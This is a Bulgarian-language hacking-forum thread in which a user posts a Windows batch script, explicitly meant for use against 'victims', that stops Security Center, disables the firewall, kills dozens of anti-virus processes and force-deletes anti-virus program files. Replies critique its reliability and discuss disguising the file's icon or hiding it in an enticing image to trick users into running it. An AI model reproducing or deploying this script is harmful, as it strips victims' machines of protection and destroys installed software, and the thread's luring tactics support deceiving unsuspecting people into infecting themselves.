Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad
erko

Премахнете анти-вирусните на жертвите си !

Recommended Posts

Ето как може да премахнем (деактивираме/изтрием) Анти-вирусните на нашата жертва

Копирайте кода и го запаметете в Nodepad като файл с произволно име и разширение .bat
Ето кода:

 


@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

 

Редактирано от erko

Сподели публикацията


Адрес на коментара
Сподели в други сайтове

Забравил си да споменеш, че това важи само за Windows.

Сподели публикацията


Адрес на коментара
Сподели в други сайтове

Само малък коментар ...

del /Q /F C:\Program Files\pavprsrv\*.exe

Не винаги програмните и системните файлове са на логическо устройство C:\

При стандартна инсталация на Windows и задаване на средна степен на сигурност, системата ще генерира съобщение и потребителят ще бъде уведомен, че се прави опит за изтриване на файлове, намиращи се в служебна директория. Преди да пристъпиш към нещо подобно е добре да се проверят параметрите на фолдера (директорията), в която се съхраняват файловете, както и самите файлове. Някои файлове не могат да бъдат изтрити толкова лесно. Що се отнася до приоритета на процесите, това е друга тема. Има огромна разлика между многонишковост (мултипоточност) и паралелна обработка. Как ще прекратиш един от няколкото паралелни процеси в Windows? До Win 7 нещата изглеждаха по един начин. При Win 10 имаме доста сериозни системни изменения.

Пакетните файлов (*.bat файловете) са текстови и са много лесни за анализ. 

По-доброто решение e да се работи с WIN API.

 

Сподели публикацията


Адрес на коментара
Сподели в други сайтове
Преди 8 часа, Avatara написа:

Само малък коментар ...


del /Q /F C:\Program Files\pavprsrv\*.exe

Не винаги програмните и системните файлове са на логическо устройство C:\

При стандартна инсталация на Windows и задаване на средна степен на сигурност, системата ще генерира съобщение и потребителят ще бъде уведомен, че се прави опит за изтриване на файлове, намиращи се в служебна директория. Преди да пристъпиш към нещо подобно е добре да се проверят параметрите на фолдера (директорията), в която се съхраняват файловете, както и самите файлове. Някои файлове не могат да бъдат изтрити толкова лесно. Що се отнася до приоритета на процесите, това е друга тема. Има огромна разлика между многонишковост (мултипоточност) и паралелна обработка. Как ще прекратиш един от няколкото паралелни процеси в Windows? До Win 7 нещата изглеждаха по един начин. При Win 10 имаме доста сериозни системни изменения.

Пакетните файлов (*.bat файловете) са текстови и са много лесни за анализ. 

По-доброто решение e да се работи с WIN API.

 

Правилно, но ако нацели от стандартните директории ще навреди на машината дори и потребителя да разбере. Груб код с не много надеждни регулярни изрази и още по-ненадеждни изгледи да уцели някоя реална директория, но все пак е възможно да навреди на машината. Впрочем по-интересно ми е как ще накара потребителя да свали и стартира този .bat файл. Ясно е, че ще се украси иконката на файла, но така обяснено, някой може да получи автоимунна болест при тестването на кода :D :D :D

  • Thanks 1

Сподели публикацията


Адрес на коментара
Сподели в други сайтове

Да. Грубо, но може да направи много поразии. Напълно съм съгласен.

А болестта (вирусът) най-често се поставя в "контейнер" и се изпраща на потребителя. Това се нарича "стеганография".

Обичайно се използва интригуваща снимка. :D

Като се замисля, май няма да е зле да обясним какво е това.

 

  • Like 1

Сподели публикацията


Адрес на коментара
Сподели в други сайтове

Създайте нов акаунт или се впишете, за да коментирате

За да коментирате, трябва да имате регистрация

Създайте акаунт

Присъединете се към нашата общност. Регистрацията става бързо!

Регистрация на нов акаунт

Вход

Имате акаунт? Впишете се оттук.

Вписване

  • Потребители разглеждащи страницата   0 потребители

    No registered users viewing this page.

×

Important Information

За да посещавате този уебсайт е необходимо да се съгласите с Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.